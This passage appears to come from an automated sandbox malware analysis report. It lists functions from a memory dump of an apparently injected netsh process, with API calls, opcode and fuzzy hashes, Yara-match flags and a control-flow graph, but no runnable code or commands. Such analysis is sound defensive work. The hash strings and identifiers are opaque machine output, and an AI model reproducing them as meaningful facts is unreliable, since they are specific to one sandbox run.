                                                                                                      • Opcode Fuzzy Hash: 50534f20ffc5672809148808016a6915c0ab32bbbc46f4291d9df044d7672cf6
                                                                                                      • Instruction Fuzzy Hash: A101A5716012147BD210EBA4DC46FEB73ACEB85714F404209FA18A72C1DB707901C7E6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C278F0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00C27927
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID:
                                                                                                      • API String ID: 3535843008-0
                                                                                                      • Opcode ID: df1470d35645786788c12b704a489055868d3b7b6fb03ba64aaf800453adc970
                                                                                                      • Instruction ID: 0e1dd89392cba65eda644a86ef576c0945c06b36a44706e792203a147cd053c5
                                                                                                      • Opcode Fuzzy Hash: df1470d35645786788c12b704a489055868d3b7b6fb03ba64aaf800453adc970
                                                                                                      • Instruction Fuzzy Hash: 88E04F312002147BD510BB59DC42FD7B75CDFC5720F404015FA08A7142CA70B91187B1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: ecf1a3b6b8e19e7d437d02d2b56aae41c5ae3df78f5707664cb7fc1bcb2d60a3
                                                                                                      • Instruction ID: c5b83e1583e4c4d7756008a8621cc82e48c55f8bb138366906b5263fbb5b8e2c
                                                                                                      • Opcode Fuzzy Hash: ecf1a3b6b8e19e7d437d02d2b56aae41c5ae3df78f5707664cb7fc1bcb2d60a3
                                                                                                      • Instruction Fuzzy Hash: 7390023161584422A140B15948C454A400597E0301B55C029E0424564C8B158A565362
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 230dcda87921a0bd4166be649c20e71e46ca350711a3b8a02b44670ea68688f3
                                                                                                      • Instruction ID: 695a732bdef789ef9da82577ff1b6dff033dc23a422cbbd42a0ff02278f7b131
                                                                                                      • Opcode Fuzzy Hash: 230dcda87921a0bd4166be649c20e71e46ca350711a3b8a02b44670ea68688f3
                                                                                                      • Instruction Fuzzy Hash: 89900261611544525140B159484440A600597E1301395C12DA0554570C87198955926A
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 0db5fcc634406122f1b7cf3b9fbedab5bde8926d9e7674b377a6bf1de9f3d40e
                                                                                                      • Instruction ID: b6b54f52440dfee2d005f705740dedeabcf2a4f802763003b70522154541b336
                                                                                                      • Opcode Fuzzy Hash: 0db5fcc634406122f1b7cf3b9fbedab5bde8926d9e7674b377a6bf1de9f3d40e
                                                                                                      • Instruction Fuzzy Hash: B9900261212444135105B159445461A400A87E0301B55C039E10145A0DC62689916126
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: fd9cc16e90f4bfa73cd7884b93ede1532b8402bc3d63f4be0b2be82eeb15fbe8
                                                                                                      • Instruction ID: 3ca9969354fff84ddb932eb20ee514eb5202d9e49b27f16aa6245742256542d5
                                                                                                      • Opcode Fuzzy Hash: fd9cc16e90f4bfa73cd7884b93ede1532b8402bc3d63f4be0b2be82eeb15fbe8
                                                                                                      • Instruction Fuzzy Hash: 69900225231444121145F559064450F044597D6351395C02DF14165A0CC72289655322
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 410cae748392df966ea0f900380d6c8090d818ecd8222a621b24969ef194978b
                                                                                                      • Instruction ID: e294b3642e4ca6ff9df9efc038969ac04d63750b9670a4c1c5d9894c55a83399
                                                                                                      • Opcode Fuzzy Hash: 410cae748392df966ea0f900380d6c8090d818ecd8222a621b24969ef194978b
                                                                                                      • Instruction Fuzzy Hash: 0E900435331444131105F55D074450F0047C7D5351355C03DF1015570CD733CD715133
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 5a15c4d68d473acb7ee64960624d4b74d473978aa58d9b664a01925303968763
                                                                                                      • Instruction ID: aa2d4aa3bccc19897fab44bca979279cb8ebc1bd392317eea7fe1eb740d3bef8
                                                                                                      • Opcode Fuzzy Hash: 5a15c4d68d473acb7ee64960624d4b74d473978aa58d9b664a01925303968763
                                                                                                      • Instruction Fuzzy Hash: E290026135144852E100B1594454B0A0005C7E1301F55C02DE1064564D871ACD526127
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 61595aae6265ee9d3943cf309a04a2a18db86c2955ce73fa91c69b0167f53571
                                                                                                      • Instruction ID: bd243a0d4b9656322d732506186ff5feef5ebdf913ba1cc9eccd6fdab6a11f67
                                                                                                      • Opcode Fuzzy Hash: 61595aae6265ee9d3943cf309a04a2a18db86c2955ce73fa91c69b0167f53571
                                                                                                      • Instruction Fuzzy Hash: EE900221221C4452E200B5694C54B0B000587D0303F55C12DA0154564CCA1689615522
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 6013511d13ef01667d739b28cd40323bb8265d379e37832e769f6d534bce591d
                                                                                                      • Instruction ID: 53d50d19cf5ee9bd5a558b983a7cafbbe14eda146cfc45f5c3d669a446538964
                                                                                                      • Opcode Fuzzy Hash: 6013511d13ef01667d739b28cd40323bb8265d379e37832e769f6d534bce591d
                                                                                                      • Instruction Fuzzy Hash: 21900221611444525140B169888490A4005ABE1311755C139A0998560D865A89655666
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 3d761f7bf052b9f47a1b8523d5afbdc310362dec0a8b896a9dd2415500c0657a
                                                                                                      • Instruction ID: 3ebe3221104b2058d282c806fc0d6bcc87d36594305ef972e12cd186e61fbc5c
                                                                                                      • Opcode Fuzzy Hash: 3d761f7bf052b9f47a1b8523d5afbdc310362dec0a8b896a9dd2415500c0657a
                                                                                                      • Instruction Fuzzy Hash: 5D90026121184813E140B559484460B000587D0302F55C029A2064565E8B2A8D516136
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 05e14d307bed0fe5b5648cd9da3e2de984fbbbcde6ab48dfe21eb871db31a28d
                                                                                                      • Instruction ID: 0326b07043b5ac0e1100348ecfeae569daec73a9829bea1180f3d1340846c3f1
                                                                                                      • Opcode Fuzzy Hash: 05e14d307bed0fe5b5648cd9da3e2de984fbbbcde6ab48dfe21eb871db31a28d
                                                                                                      • Instruction Fuzzy Hash: 1990022131144413E140B159545860A4005D7E1301F55D029E0414564CDA1689565223
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 81bf090b6b7c1e0631093994b7b80449044bd54990bd6dd2aff53c50b5314bb6
                                                                                                      • Instruction ID: 7d491f16646ec6120343efd6234efb6f589b2328ce355073d2c95b06c100248c
                                                                                                      • Opcode Fuzzy Hash: 81bf090b6b7c1e0631093994b7b80449044bd54990bd6dd2aff53c50b5314bb6
                                                                                                      • Instruction Fuzzy Hash: 0790022922344412E180B159544860E000587D1302F95D42DA0015568CCA1689695322
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 2c414a72d58fa9c21ecbba429e4b274c8687d9ec240a11aa02f5e8d6a318d251
                                                                                                      • Instruction ID: fd4635e9e153ad80351c4efdd02a8ef6b0672d58fcfd49e23e6362a80e77222a
                                                                                                      • Opcode Fuzzy Hash: 2c414a72d58fa9c21ecbba429e4b274c8687d9ec240a11aa02f5e8d6a318d251
                                                                                                      • Instruction Fuzzy Hash: 4790023121144823E111B159454470B000987D0341F95C42AA0424568D97578A52A122
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 30b2ae8f9fe4fbf6978558a41b9435882c9dbdb5293bb4c3f8e7d5a16751afe0
                                                                                                      • Instruction ID: cf3c5056857058ecd4dc7197011552284cb4bb9401bc8f94eaa2460b9b8bee8b
                                                                                                      • Opcode Fuzzy Hash: 30b2ae8f9fe4fbf6978558a41b9435882c9dbdb5293bb4c3f8e7d5a16751afe0
                                                                                                      • Instruction Fuzzy Hash: 65900221252485626545F159444450B400697E0341795C02AA1414960C86279956D622
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 4889296cfe23a25a2ec3a7d1084fbf29df3f216278e0d0dd446845e80df4f808
                                                                                                      • Instruction ID: 548e1be19088a5903143f9d4564398fd34e501dd404a75be2feb806551ca805e
                                                                                                      • Opcode Fuzzy Hash: 4889296cfe23a25a2ec3a7d1084fbf29df3f216278e0d0dd446845e80df4f808
                                                                                                      • Instruction Fuzzy Hash: F59002312114CC12E110B159844474E000587D0301F59C429A4424668D879689917122
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 77f121bd877cfa81a8cd01d9f9777e7a1d1a97ece20cdfb23b8966e7b352c3f6
                                                                                                      • Instruction ID: e8d980ed124135119d45c5ccfcc0adb6bb1e9d9d0805e941826e93ec203085cf
                                                                                                      • Opcode Fuzzy Hash: 77f121bd877cfa81a8cd01d9f9777e7a1d1a97ece20cdfb23b8966e7b352c3f6
                                                                                                      • Instruction Fuzzy Hash: 1F90023121144C52E100B1594444B4A000587E0301F55C02EA0124664D8716C9517522
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 030b4685a6e249efb7e222c015ac4799afcf0da137957e5f9c85bc789e19c95f
                                                                                                      • Instruction ID: c55945e20f95c4b8a075ae2dfc51ba9d6d2873798d664e0d13c0ead210a10b01
                                                                                                      • Opcode Fuzzy Hash: 030b4685a6e249efb7e222c015ac4799afcf0da137957e5f9c85bc789e19c95f
                                                                                                      • Instruction Fuzzy Hash: 3390023121144812E100B599544864A000587E0301F55D029A5024565EC76689916132
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 8f42c9c87f65d804f182d559c96c2e59557ed1ca3e5b138dd61a6be50612914e
                                                                                                      • Instruction ID: d0698a5bd8237c0a8265f814affa8b8e184f642f8c1efdd0b2f3148c4ff9a0b1
                                                                                                      • Opcode Fuzzy Hash: 8f42c9c87f65d804f182d559c96c2e59557ed1ca3e5b138dd61a6be50612914e
                                                                                                      • Instruction Fuzzy Hash: D590023161554812E100B159455470A100587D0301F65C429A0424578D87968A5165A3
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: b6fde7cd2944692bf752e8d365d05ea166362bc9440a83a0f8a26c6d12223937
                                                                                                      • Instruction ID: 85aa6a30f86232a9bf29368beffd7052b8b6016f09351b1e74e22a7ede6f6fe3
                                                                                                      • Opcode Fuzzy Hash: b6fde7cd2944692bf752e8d365d05ea166362bc9440a83a0f8a26c6d12223937
                                                                                                      • Instruction Fuzzy Hash: 6F90022125549512E150B15D444461A4005A7E0301F55C039A08145A4D865689556222
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C102A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88threadwindowCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 523 c102a0-c102c3 524 c102c6-c102cd 523->524 525 c102dd 523->525 526 c102cf-c102d7 524->526 527 c102de-c1034a call c298b0 call c2a2c0 call c13ce0 call c01410 call c20b70 524->527 525->527 526->525 538 c1036a-c10370 527->538 539 c1034c-c1035b PostThreadMessageW 527->539 539->538 540 c1035d-c10367 539->540 540->538
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(1-00F23L,00000111,00000000,00000000), ref: 00C10357
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 1-00F23L$1-00F23L
                                                                                                      • API String ID: 1836367815-1360091209
                                                                                                      • Opcode ID: 5f9e2b26bd98639136fb5dcd2a4a45b7ee778c2e8883e2c9db1025d63544de6b
                                                                                                      • Instruction ID: 77e58933ffc1d3af0b0c79f6da7bf35c76a2da70c26be5820ffecc42233a397d
